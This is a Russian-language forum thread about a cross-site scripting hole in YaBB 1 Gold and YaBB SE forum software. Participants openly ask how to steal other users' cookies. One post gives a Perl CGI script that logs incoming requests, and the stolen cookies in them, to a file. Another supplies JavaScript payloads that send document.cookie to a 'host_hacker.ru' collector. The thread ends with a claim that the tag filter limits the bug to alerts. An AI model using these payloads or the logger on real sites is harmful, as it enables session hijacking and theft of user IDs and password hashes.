Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Межсайтовый скриптинг в YaBB 1 Gold и YaBB SE
 
Обсуждение статьи Межсайтовый скриптинг  в YaBB 1 Gold  и YaBB SE
 
А че этот сплоит собственно делает?
 
Цитата
шиш пишет:
А че этот сплоит собственно делает?
Вылетает алерт с данными кукисов,того кто его открыл!
А кто ниб може подсказать как организовать ,то что бы данные кукисов не алертом вылетали,а например записывалисль на мой сервак на котором находиться скрипт!
Если мона по подробнее!
 
Цитата
elEcTr0N пишет:
 
Цитата
шиш пишет:
А че этот сплоит собственно делает?
Вылетает алерт с данными кукисов,того кто его открыл!
А кто ниб може подсказать как организовать ,то что бы данные кукисов не алертом вылетали,а например записывалисль на мой сервак на котором находиться скрипт!
Если мона по подробнее!

Фпалне можна в лог будет писатся ID юзера и иго hash pass


#!/usr/bin/perl
$file="путь";
for(qw/HTTP_REFERER QUERY_STRING/){
$ENV{$_}=~y/+/ /;
$ENV{$_}=~s/%([a-fA-F0-9]{2})/pack("C",hex($1))/eg
}
open(z,">>$file");
print z "\n[".scalar(localtime(time))."]\n";
for(qw/REMOTE_ADDR REMOTE_HOST HTTP_X_FORWARDED_FOR HTTP_REFERER HTTP_USER_AGENT QUERY_STRING/){
print z "$_ = $ENV{$_}\n"
}
close(z);
print "Content-Type: text/html\nPragma: no-cache\n\n<br>";
 
А как вставить в сообщение ссылку на мой скрипт которые ворует плюшки?
 
Что никто не знает как вставить ссылку???
очень надо, помогите пожалуйста.
 
yoblow
Мля.... ну нельзя же быть таким ленивым! Нужно хоть капельку мозгов иметь! Ты думаешь, что тут никому нечего делать как рассказать про элементарщину?

Почитай тут: http://www.bugtraq.ru/library/www/xssanatomy.html

и тут: http://www.bugtraq.ru/library/www/advancedxss.html

Если мозги есть - поймёшь
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Не надо мне давать линки на мануалы по XSS. Я прекрасно в этом разбираюсь. Меня интересует ссылка конкретно в этом баге, т.к. там идет обработка ссылок в теге.
 
yoblow
Ну, коли разбираешься, то мог догадаться, что вместо

"alert(document.cookie)"

нужно вставить свой код. Например:   "document.location.href='http://www.host_hacker.ru/cgi-bin/c ookie.cgi?'+document.cookie"

Хотя, на сколько я помню, такая штука почему-то не работала на форуме YaBB 1 Gold (SP1.3)...

Тогда можно попробовать:   "window.open('http://www.host_hacker.ru/cgi-bin/cookie.cgi?' + document.cookie"

Более подробно про XSS в тэгах читай тут
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Догадатся то я догадался, но в теге проверяется конструкция "http://", поэтому любой вид ссылки на скрипт записывающиц куки невозможна. Значит бага как такового нет. Кроме алертов там выполнить ничего нельзя.
Страницы: 1
Читают тему